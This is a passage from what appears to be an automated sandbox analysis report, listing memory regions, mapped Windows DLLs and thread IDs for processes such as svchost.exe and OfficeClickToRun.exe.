7606 start_va = 0x7fefda60000 end_va = 0x7fefda79fff monitored = 0 entry_point = 0x7fefda61558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 7607 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 7608 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7609 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7610 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7611 start_va = 0x7fefef30000 end_va = 0x7fefefa0fff monitored = 0 entry_point = 0x7fefef41e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 7612 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7613 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7614 start_va = 0x7feff130000 end_va = 0x7feff137fff monitored = 0 entry_point = 0x7feff131504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7615 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7616 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 7617 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7618 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 7619 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 7620 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 7621 start_va = 0x7feff680000 end_va = 0x7feff856fff monitored = 0 entry_point = 0x7feff681010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 7622 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7623 start_va = 0x7fffff6c000 end_va = 0x7fffff6dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6c000" filename = "" Region: id = 7624 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 7625 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 7626 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 7627 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 7628 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 7629 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7630 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 7631 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 7632 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 7633 start_va = 0x7fffffda000 end_va = 0x7fffffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 7634 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 7635 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 417 os_tid = 0xfc4 Thread: id = 418 os_tid = 0xfa8 Thread: id = 419 os_tid = 0xfa4 Thread: id = 420 os_tid = 0xf88 Thread: id = 421 os_tid = 0xec0 Thread: id = 422 os_tid = 0xd30 Thread: id = 423 os_tid = 0x7b8 Thread: id = 424 os_tid = 0x784 Thread: id = 425 os_tid = 0x780 Thread: id = 426 os_tid = 0x520 Thread: id = 427 os_tid = 0x514 Thread: id = 428 os_tid = 0x50c Process: id = "46" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x53700000" os_pid = "0x530" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x1c8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BFE" [0xe], "NT SERVICE\\DPS" [0xa], "NT SERVICE\\MpsSvc" [0xa], "NT SERVICE\\pla" [0xa], "NT SERVICE\\WwanSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00014725" [0xc000000f], "LOCAL" [0x7], "NT AUTHORITY\\WRITE RESTRICTED" [0x7] Thread: id = 429 os_tid = 0xf20 Thread: id = 430 os_tid = 0x4a4 Thread: id = 431 os_tid = 0x7a0 Thread: id = 432 os_tid = 0x79c Thread: id = 433 os_tid = 0x72c Thread: id = 434 os_tid = 0x678 Thread: id = 435 os_tid = 0x66c Thread: id = 436 os_tid = 0x650 Thread: id = 437 os_tid = 0x628 Thread: id = 438 os_tid = 0x624 Thread: id = 439 os_tid = 0x620 Thread: id = 440 os_tid = 0x5c8 Thread: id = 441 os_tid = 0x5a8 Thread: id = 442 os_tid = 0x58c Thread: id = 443 os_tid = 0x578 Thread: id = 444 os_tid = 0x564 Thread: id = 445 os_tid = 0x540 Thread: id = 446 os_tid = 0x534 Process: id = "47" image_name = "officeclicktorun.exe" filename = "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe" page_root = "0x7577d000" os_pid = "0x604" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x1c8" cmd_line = "\"C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe\" /service" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 7779 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7780 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7781 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7782 start_va = 0x40000 end_va = 0x42fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7783 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7784 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 7785 start_va = 0xd0000 end_va = 0xdcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 7786 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 7787 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 7788 start_va = 0x100000 end_va = 0x10ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 7789 start_va = 0x110000 end_va = 0x111fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 7790 start_va = 0x120000 end_va = 0x121fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 7791 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 7792 start_va = 0x140000 end_va = 0x141fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 7793 start_va = 0x150000 end_va = 0x151fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 7794 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 7795 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 7796 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 7797 start_va = 0x190000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 7798 start_va = 0x290000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 7799 start_va = 0x390000 end_va = 0x390fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 7800 start_va = 0x3a0000 end_va = 0x3a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 7801 start_va = 0x3b0000 end_va = 0x3b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 7802 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 7803 start_va = 0x3d0000 end_va = 0x3d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7804 start_va = 0x3e0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 7805 start_va = 0x4e0000 end_va = 0x667fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 7806 start_va = 0x670000 end_va = 0x7f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 7807 start_va = 0x800000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 7808 start_va = 0x8c0000 end_va = 0xb8efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7809 start_va = 0xb90000 end_va = 0xc8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 7810 start_va = 0xc90000 end_va = 0xc90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c90000" filename = "" Region: id = 7811 start_va = 0xca0000 end_va = 0xca0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ca0000" filename = "" Region: id = 7812 start_va = 0xcb0000 end_va = 0xcb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cb0000" filename = "" Region: id = 7813 start_va = 0xcc0000 end_va = 0xcc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cc0000" filename = "" Region: id = 7814 start_va = 0xcd0000 end_va = 0xcd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cd0000" filename = "" Region: id = 7815 start_va = 0xce0000 end_va = 0xce0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 7816 start_va = 0xcf0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cf0000" filename = "" Region: id = 7817 start_va = 0xd00000 end_va = 0xd0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 7818 start_va = 0xd10000 end_va = 0xd2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 7819 start_va = 0xd30000 end_va = 0xd37fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 7820 start_va = 0xd40000 end_va = 0xd43fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Windows\\System32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 7821 start_va = 0xd50000 end_va = 0xd53fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 7822 start_va = 0xd70000 end_va = 0xe6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d70000" filename = "" Region: id = 7823 start_va = 0xea0000 end_va = 0xf9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ea0000" filename = "" Region: id = 7824 start_va = 0x10b0000 end_va = 0x11affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 7825 start_va = 0x11d0000 end_va = 0x12cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011d0000" filename = "" Region: id = 7826 start_va = 0x12d0000 end_va = 0x13d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012d0000" filename = "" Region: id = 7827 start_va = 0x1440000 end_va = 0x14bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 7828 start_va = 0x14c0000 end_va = 0x153ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 7829 start_va = 0x1570000 end_va = 0x166ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001570000" filename = "" Region: id = 7830 start_va = 0x16b0000 end_va = 0x17affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016b0000" filename = "" Region: id = 7831 start_va = 0x17b0000 end_va = 0x17bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017b0000" filename = "" Region: id = 7832 start_va = 0x17e0000 end_va = 0x18dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017e0000" filename = "" Region: id = 7833 start_va = 0x18f0000 end_va = 0x19effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000018f0000" filename = "" Region: id = 7834 start_va = 0x19f0000 end_va = 0x1aaffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 7835 start_va = 0x1bc0000 end_va = 0x1dc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001bc0000" filename = "" Region: id = 7836 start_va = 0x1dd0000 end_va = 0x1fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001dd0000" filename = "" Region: id = 7837 start_va = 0x2050000 end_va = 0x214ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 7838 start_va = 0x21b0000 end_va = 0x22affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021b0000" filename = "" Region: id = 7839 start_va = 0x23d0000 end_va = 0x244ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023d0000" filename = "" Region: id = 7840 start_va = 0x2450000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 7841 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 7842 start_va = 0x2850000 end_va = 0x294ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002850000" filename = "" Region: id = 7843 start_va = 0x2b30000 end_va = 0x2baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b30000" filename = "" Region: id = 7844 start_va = 0x2bb0000 end_va = 0x2faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bb0000" filename = "" Region: id = 7845 start_va = 0x34f0000 end_va = 0x38effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034f0000" filename = "" Region: id = 7846 start_va = 0x38f0000 end_va = 0x40effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038f0000" filename = "" Region: id = 7847 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7848 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7849 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7850 start_va = 0x779d0000 end_va = 0x779d6fff monitored = 0 entry_point = 0x779d106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 7851 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 7852 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 7853 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7854 start_va = 0x13fcb0000 end_va = 0x13ff58fff monitored = 0 entry_point = 0x13fcd2188 region_type = mapped_file name = "officeclicktorun.exe" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe") Region: id = 7855 start_va = 0x7fef29d0000 end_va = 0x7fef2bc1fff monitored = 0 entry_point = 0x7fef29d101c region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 7856 start_va = 0x7fef4bf0000 end_va = 0x7fef4bfbfff monitored = 0 entry_point = 0x7fef4bf602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 7857 start_va = 0x7fef5d90000 end_va = 0x7fef5ddcfff monitored = 0 entry_point = 0x7fef5da792c region_type = mapped_file name = "appvfilesystemmetadata.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppVFileSystemMetadata.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvfilesystemmetadata.dll") Region: id = 7858 start_va = 0x7fef5de0000 end_va = 0x7fef5f39fff monitored = 0 entry_point = 0x7fef5e9565c region_type = mapped_file name = "appvisvsubsystemcontroller.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppVIsvSubsystemController.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystemcontroller.dll") Region: id = 7859 start_va = 0x7fef5f40000 end_va = 0x7fef6149fff monitored = 0 entry_point = 0x7fef603b0a0 region_type = mapped_file name = "appvintegration.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppVIntegration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll") Region: id = 7860 start_va = 0x7fef6150000 end_va = 0x7fef61dcfff monitored = 0 entry_point = 0x7fef6190cc4 region_type = mapped_file name = "appvisvvirtualization.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppVIsvVirtualization.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvvirtualization.dll") Region: id = 7861 start_va = 0x7fef61e0000 end_va = 0x7fef6281fff monitored = 0 entry_point = 0x7fef622988c region_type = mapped_file name = "appvcatalog.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppVCatalog.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcatalog.dll") Region: id = 7862 start_va = 0x7fef6290000 end_va = 0x7fef63befff monitored = 0 entry_point = 0x7fef62ef2a4 region_type = mapped_file name = "appvmanifest.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppVManifest.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvmanifest.dll") Region: id = 7863 start_va = 0x7fef63c0000 end_va = 0x7fef63f5fff monitored = 0 entry_point = 0x7fef63cdaa0 region_type = mapped_file name = "appvisvstreamingmanager.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppVIsvStreamingManager.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstreamingmanager.dll") Region: id = 7864 start_va = 0x7fef6400000 end_va = 0x7fef64e9fff monitored = 0 entry_point = 0x7fef646ca10 region_type = mapped_file name = "appvorchestration.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppVOrchestration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvorchestration.dll") Region: id = 7865 start_va = 0x7fef64f0000 end_va = 0x7fef65defff monitored = 0 entry_point = 0x7fef65129cc region_type = mapped_file name = "msvcr120.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\msvcr120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcr120.dll") Region: id = 7866 start_va = 0x7fef65e0000 end_va = 0x7fef6685fff monitored = 0 entry_point = 0x7fef662efec region_type = mapped_file name = "msvcp120.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\msvcp120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp120.dll") Region: id = 7867 start_va = 0x7fef6690000 end_va = 0x7fef67cefff monitored = 0 entry_point = 0x7fef66f05e4 region_type = mapped_file name = "appvpolicy.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppVPolicy.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvpolicy.dll") Region: id = 7868 start_va = 0x7fef67d0000 end_va = 0x7fef6844fff monitored = 0 entry_point = 0x7fef67fd4f0 region_type = mapped_file name = "appvisvapi.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppVIsvApi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvapi.dll") Region: id = 7869 start_va = 0x7fef68c0000 end_va = 0x7fef6930fff monitored = 0 entry_point = 0x7fef691e844 region_type = mapped_file name = "msdelta.dll" filename = "\\Windows\\System32\\msdelta.dll" (normalized: "c:\\windows\\system32\\msdelta.dll") Region: id = 7870 start_va = 0x7fef6940000 end_va = 0x7fef6a44fff monitored = 0 entry_point = 0x7fef694dae8 region_type = mapped_file name = "streamserver.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\StreamServer.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\streamserver.dll") Region: id = 7871 start_va = 0x7fef6a50000 end_va = 0x7fef6ac3fff monitored = 0 entry_point = 0x7fef6a566f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 7872 start_va = 0x7fef6ae0000 end_va = 0x7fef6de7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso40uires.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\mso40uires.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uires.dll") Region: id = 7873 start_va = 0x7fef6df0000 end_va = 0x7fef6ed1fff monitored = 0 entry_point = 0x7fef6e6d90c region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 7874 start_va = 0x7fef6ee0000 end_va = 0x7fef77cafff monitored = 0 entry_point = 0x7fef6fe5a48 region_type = mapped_file name = "mso40uiwin32client.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\mso40uiwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uiwin32client.dll") Region: id = 7875 start_va = 0x7fef77d0000 end_va = 0x7fef7c47fff monitored = 0 entry_point = 0x7fef7849154 region_type = mapped_file name = "mso30win32client.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\mso30win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso30win32client.dll") Region: id = 7876 start_va = 0x7fef7c50000 end_va = 0x7fef7f53fff monitored = 0 entry_point = 0x7fef7cf6094 region_type = mapped_file name = "mso20win32client.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\mso20win32client.dll" (normalized: "c:\\program files\\common files\\microsoft 